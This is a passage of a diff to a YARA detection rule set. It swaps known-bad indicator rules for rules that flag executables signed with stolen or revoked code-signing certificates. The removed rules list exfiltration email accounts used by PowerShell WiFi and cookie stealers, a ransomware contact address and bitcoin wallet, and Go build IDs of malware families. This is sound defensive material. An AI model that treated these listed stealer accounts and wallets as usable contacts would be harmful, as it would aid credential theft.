+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REIGN BROS ApS" and pe.signatures [ i ] . serial == "00:d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lockdown
+
+rule DITEKSHEN_INDICATOR_KB_CERT_13039Da3B2924B7A8B0A2Ac4637C2Efa : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with LockDown / cantopen ransomware"
-		author = "ditekShen"
-		id = "603f0113-d77b-590c-b2a0-804c6d1fbfbc"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "9621584b-a115-5b96-8de5-15776232cdb2"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L594-L603"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4431-L4442"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cb17bb92d6e8189a08508481b75d301a1227906815c684753859914d77d7b3e7"
+		logic_hash = "7492f2a50effae809b512ce7a2a769f3db62ab3573974206b729417cc629ca83"
 		score = 75
-		quality = 73
-		tags = ""
-
-	strings:
-		$s1 = "CCWhite@onionmail.org" ascii wide nocase
-		$s2 = "bc1q6ug0vrxz66d564qznclu9yyyvn6zurskezmt64" ascii wide
+		quality = 75
+		tags = "FILE"
+		thumbprint = "ad9fa264674c152b2298533e41e098bcaa0345af"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Tekhnokom" and pe.signatures [ i ] . serial == "13:03:9d:a3:b2:92:4b:7a:8b:0a:2a:c4:63:7c:2e:fa" )
 }
-rule DITEKSHEN_INDICATOR_KB_LNK_BOI_MAC : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2Abd2Eef14D480Dfea9Ca9Fdd823Cf03 : FILE
 {
 	meta:
-		description = "Detects Windows Shortcut .lnk files with previously known bad Birth Object ID and MAC address combination"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bfef07dc-a368-5119-82dd-de2096b17dd1"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		id = "5e17d055-26d7-5dde-a905-9d03fb164fa2"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L605-L637"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4444-L4455"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "31a7966a0ea0fca363d2b926b06c8acbdae0c24dd2156389196255dbbf4ed662"
+		logic_hash = "5f0f5dac599923f385fcd8e8b14349263cabe1c83242fe097d9fb26ea0567c1a"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$boi1 = { 2C ED AC EC 94 7A E8 11 9F DE 00 0C 29 A1 A9 40 }
-		$boi2 = { 3F 54 89 18 46 CB E8 11 BD 0E 08 00 27 6D D5 D9 }
-		$boi3 = { DE 63 02 FE 57 A2 E8 11 92 E8 5C F3 70 8B 16 F2 }
-		$boi4 = { C2 CC 13 98 18 B9 E2 41 82 40 54 A8 AD E2 0A 9A }
-		$boi5 = { C4 9D 3A D4 C2 29 3D 47 A9 20 EE A4 D8 A7 D8 7D }
-		$boi6 = { E4 51 EC 20 66 61 EA 11 85 CD B2 FC 36 31 EE 21 }
-		$boi7 = { 6E DD CE 86 0F 07 90 4B AF 18 38 2F 97 FB 53 62 }
-		$boi8 = { 25 41 87 AE F1 D2 EA 11 93 97 00 50 56 C0 00 08 }
-		$boi9 = { C4 9D 3A D4 C2 29 3D 47 A9 20 EE A4 D8 A7 D8 7D }
-		$boi10 = { 5C 46 EC 05 A6 60 EB 11 85 EB 8C 16 45 31 19 7F }
-		$boi11 = { 30 8B 17 86 9B 35 C5 40 A7 9D 48 5C D6 3D F3 5C }
-		$boi12 = { E5 21 1D 04 9D A4 E9 11 A9 37 00 0C 29 0F 29 89 }
-		$boi13 = { 34 5F AC 8A 4E CE ED 4D 8E 55 83 8E EA 24 B3 4E }
-		$boi14 = { 49 77 25 3B D6 E1 EB 11 9C BB 00 D8 61 85 FD 9F }
-		$mac1 = { 00 0C 29 A1 A9 40 }
-		$mac2 = { 08 00 27 6D D5 D9 }
-		$mac3 = { 5C F3 70 8B 16 F2 }
-		$mac4 = { 00 0C 29 5A 39 04 }
-		$mac5 = { B2 FC 36 31 EE 21 }
-		$mac6 = { 00 50 56 C0 00 08 }
-		$mac7 = { 8C 16 45 31 19 7F }
-		$mac8 = { 00 0C 29 0F 29 89 }
-		$mac9 = { 00 D8 61 85 FD 9F }
+		thumbprint = "db3d9ccf11d8b0d4f33cf4dc93689fdd942f8fbe"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and filesize < 3KB and ( 1 of ( $boi* ) and 1 of ( $mac* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BE SOL d.o.o." and pe.signatures [ i ] . serial == "2a:bd:2e:ef:14:d4:80:df:ea:9c:a9:fd:d8:23:cf:03" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Powershellwifistealer
+
+rule DITEKSHEN_INDICATOR_KB_CERT_08622B9Dd9D78E67678Ecc21E026522E : FILE
 {
 	meta:
-		description = "Detects email accounts used for exfiltration observed in PowerShellWiFiStealer"
-		author = "ditekShen"
-		id = "fa19e422-c682-5464-b034-330942daf3bd"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "922282e9-9f34-537b-9fd1-283ae44b9b54"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L691-L704"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4457-L4468"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f119b54032e2a6ca35819e811e6479b00936115d98ef6e928f4c819d04a8321f"
+		logic_hash = "7e572c4241d92ad34efd91c3f6338da4093c83d84a734766448ac7cb2a72bc0c"
 		score = 75
-		quality = 63
-		tags = ""
-
-	strings:
-		$s1 = "hajdebebreidekreide@gmail.com" ascii wide nocase
-		$s2 = "usb@pterobot.net" ascii wide nocase
-		$s3 = "umairdadaber@gmail.com" ascii wide nocase
-		$s4 = "mrumairok@gmail.com" ascii wide nocase
-		$s5 = "credsenderbot@gmail.com" ascii wide nocase
-		$s6 = "easywareytb@gmail.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "a7d86073742ea55af134e07a00aefa355dc123be"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kayak Republic af 2015 APS" and pe.signatures [ i ] . serial == "08:62:2b:9d:d9:d7:8e:67:67:8e:cc:21:e0:26:52:2e" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Powershellcookiestealer
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5A17D5De74Fd8F09Df596Df3123139Bb : FILE
 {
 	meta:
-		description = "Detects email accounts used for exfiltration observed in PowerShellCookieStealer"
-		author = "ditekShen"
-		id = "c2bbb9a8-3e4c-5676-9676-2708a196ef8d"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "871d9840-4540-58d3-980e-d356c856dbca"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L706-L715"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4470-L4481"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bd404e94939acb92dd56a7d2a1f7536bcb3f520ca1e9dc614b53828afbc6dac8"
+		logic_hash = "f5ff9f7d857da3329708ba9c0bfac0999b04aeb170fb60387f4b48fa6029a641"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "senmn0w@gmail.com" ascii wide nocase
-		$s2 = "mohamed.trabelsi.ena2@gmail.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "1da887a57dddd7376a18f75841559c9682f78b04"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTA FIS d.o.o." and pe.signatures [ i ] . serial == "5a:17:d5:de:74:fd:8f:09:df:59:6d:f3:12:31:39:bb" )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Zebrocy : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_15Da61D7E1A631803431561674Fb9B90 : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "fc805e9d-47a0-5fcb-9b21-4806c13ab7b4"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		id = "d1fd8200-0960-567d-9bb6-2bd1ed99f61b"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1541-L1550"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4483-L4494"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "16b88460896012b42ca576995f5de98a7a9d2fcc53f8e148427bca31a883d19b"
+		logic_hash = "4d30a4bf1b0425081369351df707be0531dcc1751512d9012a859b621d61a1b3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID: \"l6RAKXh3Wg1yzn63nita/b2_Y0DGY05NFWuZ_4gUT/H91sCRktnyyYVzECfvvA/l8f-yII0L_miSjIe-VQu\"" ascii
-		$s2 = "Go build ID: \"fiGGvLVFcvIhuJsSaail/jLt9TEPQiusg7IpRkp4H/hlcoXZIfsl1D4521LqEL/yL8dN86mCNc39WqQTgGn\"" ascii
+		thumbprint = "9a9bc3974e3cbbabdeb2b6debdc0455586e128a4"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JAY DANCE STUDIO d.o.o." and pe.signatures [ i ] . serial == "15:da:61:d7:e1:a6:31:80:34:31:56:16:74:fb:9b:90" )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Gostealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_58Aa64564A50E8B2D6E31D5Cd6250Fde : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "25c0eb8b-c69c-5f50-b622-daaa3c8c62a4"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		id = "b6eff323-241a-5f11-837f-bfacdc547d89"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1552-L1562"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4496-L4507"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d548bc2580c8e8233a5fcdf85b947547c10f2c4d0056d14e990f30dd7b9a0672"
+		logic_hash = "7383dfc8b22379dc69cd1d93d2da40e177ba1e3b0b8b8891afb8ce594269d170"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID: \"xQV-b1Fr7d576TTTpbXi/gq4FgVQqMcg--9tmY13y/76rKNEUBENlDFDcecmm_/mbw17A_6WrROaNCYDEQF\"" ascii
-		$s2 = "Go build ID: \"x4VqrSSsx8iysxVdfB-z/gIF3p7SUxiZsVgTuq7bN/93XHuILGnGYq2L83fRpj/eoY6nTqwk1sdMHTaXzlw\"" ascii
-		$s3 = "Go build ID: \"BPRThIYWbHcZQQ4K1y2t/2mO0-FjLC50P0QZuMTgC/9i6TYw_akiEF9ZPN0s3p/s1XoqXr7EyXMDVw5TTP3\"" ascii
+		thumbprint = "a7b43a5190e6a72c68e20f661f69ddc24b5a2561"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foreground" and pe.signatures [ i ] . serial == "58:aa:64:56:4a:50:e8:b2:d6:e3:1d:5c:d6:25:0f:de" )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Goldenaxe : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Bbd4Dc3768A51Aa2B3059C1Bad569276 : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e734d5b4-2332-5b46-a05e-fb35134ea070"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		id = "cb5214b4-1af5-5b31-b690-6531139e92b1"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1564-L1573"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4509-L4520"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4ab9aeaa74530de4a62ddfa8d7e8607e455d0ba4330260037327bec6d8d7abab"
+		logic_hash = "d506c2d6e630fabe1d4b805cd31aa54b04959db80630f656b3460c869ad544fa"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID: \"BrJuyMRdiZ7pC9Cah0is/rbDB__hXWimivbSGiCLi/B35SPLQwHal3ccR2gXNx/hEmVzhJWWatsrKwnENh_\"" ascii
-		$s2 = "Go build ID: \"5bgieaBe9PcZCZf23WFp/bCZ0AUHYlqQmX8GJASV6/fGxRLMDDYrTm1jcLMt8j/Wof3n5634bwiwLHFKHTn\"" ascii
+		thumbprint = "36936c4aa401c3bbeb227ce5011ec3bdc02fdd14"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JJ ELECTRICAL SERVICES LIMITED" and pe.signatures [ i ] . serial == "00:bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76" )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Nemty : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3A236F003Bdefc0C55Aa42D9C6C0B08E : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "512fe910-e38c-513c-b678-a0592bdc4ae2"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		id = "02c95d8f-f694-5d0f-bf79-b806334e8af3"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1575-L1588"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4522-L4533"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "246766ab1d2871b5c22323f622d39ce9fa9b46a2d43bace122ed5549484f3aac"
+		logic_hash = "9930b2d3fdbd2f6da17d78dfbfe6229f0bd004686e4cc4960720710241237e48"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID: \"R6dvaUktgv2SjVXDoMdo/kKgwagwoLRC88DpIXAmx/eipNq7_PQCTCOhZ6Q74q/RHJkCaNdTbd6qgYiA-EC\"" ascii
-		$s2 = "Go build ID: \"vsdndTwlj03gbEoDu06S/anJkXGh7N08537M0RMms/VG58d99axcdeD_z1JIko/tfDVbCdWUId-VX90kuT7\"" ascii
-		$s3 = "Go build ID: \"FG9JEesXBQ04oNCv2bIS/MmjCdGa3ogU_6DIz6bZR/AjrqKBSezDfY1t7U9xr-/-06dIpZsukiVcN0PtOCb\"" ascii
-		$s4 = "Go build ID: \"MJ8bS1emWrrlXiE_C61E/A6GaZzhLls_pFKMGfU1H/ZgswGQy_lzK-I4cZykwm/8JzjhV06jZosSa5Qih5O\"" ascii
-		$s5 = "Go build ID: \"_vQalVQKn2O8kxxA4vVM/slXlklhnjEF5tawjlPzW/t26rDRURK6ii0MqU7gIx/MNq6vj_uM15RhjVC2QuX\"" ascii
-		$s6 = "Go build ID: \"KWssFDTp6mq16xlI5c0t/mQLgof0oyp-eYKqNYUFL/Np8S71zE5W5_BsJCpjsj/hXpFDaVCtay2509R05fd\"" ascii
+		thumbprint = "5ba147ebae6089f99823b1640c305b337b1a4c36"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Assurio" and pe.signatures [ i ] . serial == "3a:23:6f:00:3b:de:fc:0c:55:aa:42:d9:c6:c0:b0:8e" )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Qnapcrypt : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_010000000001302693Cb45 : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4cdea15f-d8fd-5720-ba25-eb60e9b0f9ce"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		id = "0ab8e30d-dd75-5dd1-9bc8-413e59d5d310"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1590-L1598"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4535-L4547"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b3ee583c395701350c091041a72f988d1b5ae607b642b42152fcda29f9be63e2"
+		hash = "74069d20e8b8299590420c9af2fdc8856c14d94929c285948585fc89ab2f938f"
+		logic_hash = "74c5d88012ab3e975123cde51ae3d01b6bee1ad0d6c0f5492c507fb2472b7532"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID: \"XcBqbQohm7UevdYNABvs/2RcJz1616naXSRu2xvTX/b6F3Jt1-5WAIexSyzeun/MpHqs5fJA5G2D9gVuUCe\"" ascii
+		thumbprint = "bc5fcb5a2b5e0609e2609cff5e272330f79b2375"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AutoIt Consulting Ltd" and pe.signatures [ i ] . serial == "01:00:00:00:00:01:30:26:93:cb:45" )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Snatch : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3F8D23C136Ae9Cbeeac7605B24Ec0391 : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6ab6b7bc-c905-5ff9-8059-a2d512ba13b3"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		id = "86617b78-86b0-59dc-a072-cb4acecd60e1"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1600-L1610"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4565-L4576"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5a19c791ed0d829c4c97e35cfa604a8716bad3f02632712903d765db95ba87f6"
+		logic_hash = "f074e141e07cbf6b5b4726b52faa382b8ece809804dcfb9d45a5b2450125b5b7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID: \"8C2VvDTH-MuUPx8tL42E/PWF9iuE2j_Zt0ANsTlty/c64swZ5TtuaIpHuEFmga/6sS0KWNryc-YAduDnWWO\"" ascii
-		$s2 = "Go build ID: \"UBrfJ_wztDfCHWakqvlV/LhzfkJwvKFrNhKCHtU9_/sveCupt8GVbvu6WZiyA-/GcimfL_TPl6FTPPriBDr\"" ascii
-		$s3 = "Go build ID: \"5zCy9jt7UZaIs5YPk4tt/1Yt6v7gCpDG---pRFyW-/7729nLSeKJik31ftz_Ve/Z5EVG3lWak3ynxNrJ4ih\"" ascii
+		thumbprint = "ff481ea6a887f3b5b941ff7d99a6cdf90c814c40"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bandicam Company" and pe.signatures [ i ] . serial == "3f:8d:23:c1:36:ae:9c:be:ea:c7:60:5b:24:ec:03:91" )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Godownloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3972443Af922B751D7D36C10Dd313595 : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "da53c062-4a55-543d-b2b6-52acdf13febc"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		id = "21ada866-167a-54d5-a137-7720de32520e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1612-L1622"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4578-L4589"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e0f5ee6ade4608a8b5c5bd02bf5aef0fcb9cb1fe1cc3a9d00b1ace91e5d0d33f"
+		logic_hash = "764d0a288edd3bac90c0b93319f4f8ff8a7d567cda42aa52fe6114f4e56216ad"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID: \"1OzJqWaH4h1VtrLP-zk8/G9w32ha7_ziW1Fa-0Byj/gLtfhbXZ6i_W0e5e_tFF/ekG0n9hOcZjmwzRQnRqC\"" ascii
-		$s2 = "Go build ID: \"kKxyj14l4NhGbuhOgzef/ab_yr_pUn6q2idYdoBhn/hFAjO_Yxc_rN6mHFuHM9/SmS3qmOyJBc_4xV_qg3B\"" ascii
-		$s3 = "Go build ID: \"MiW7XJnQsBXxlBHro8GW/HMqQknRgJg-mCXomgFRt/88ccKMrfA_s6AcOJs3aM/jSUAU_l3RrMzlV6ANEYE\"" ascii
+		thumbprint = "d89e3bd43d5d909b47a18977aa9d5ce36cee184c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sore Loser Games ApS" and pe.signatures [ i ] . serial == "39:72:44:3a:f9:22:b7:51:d7:d3:6c:10:dd:31:35:95" )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Ranumbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_37F3384B16D4Eef0A9B3344B50F1D8A3 : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f368cd9d-f974-56cf-a2b5-bd300f30cedc"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		id = "a7eef803-2c9e-5f23-acde-22ae2223fec2"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1624-L1633"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4591-L4602"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c3d0ba55ca2be1b11ebf1b82490c5d26f2b35958b31a7e55892e27f24bf4118f"
+		logic_hash = "4496052ff9677e0d031471e4ae9b3541099a2dbe024b4b5ba3f757800bfdcb07"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID: \"hOhuOA4W60aBBRoFQTDA/dl9DuLAgEcabYGK6ZT2t/ECsse3630jV_957OqqK3/ZRA_JRPFzxutK16zlEcM\"" ascii
-		$s2 = "Go build ID: \"NivDrAudWE-E6xtBXeww/3pv6fDzDqt4v0YxoTkPt/8vd79TNE-9Bt38ftxf_V/_GNqnqEUsRf-WTSmn8dM\"" ascii
+		thumbprint = "3fcdcf15c35ef74dc48e1573ad1170b11a623b40"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sore Loser Games ApS" and pe.signatures [ i ] . serial == "37:f3:38:4b:16:d4:ee:f0:a9:b3:34:4b:50:f1:d8:a3" )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Banload : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B3969Cd6B2F913Acc99C3F61Fc14852F : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5955afd5-f26f-5df1-b355-b8f168b694b0"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		id = "2cd4cee3-0adc-595f-b86f-7c515cd0ea64"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1635-L1643"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4604-L4619"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
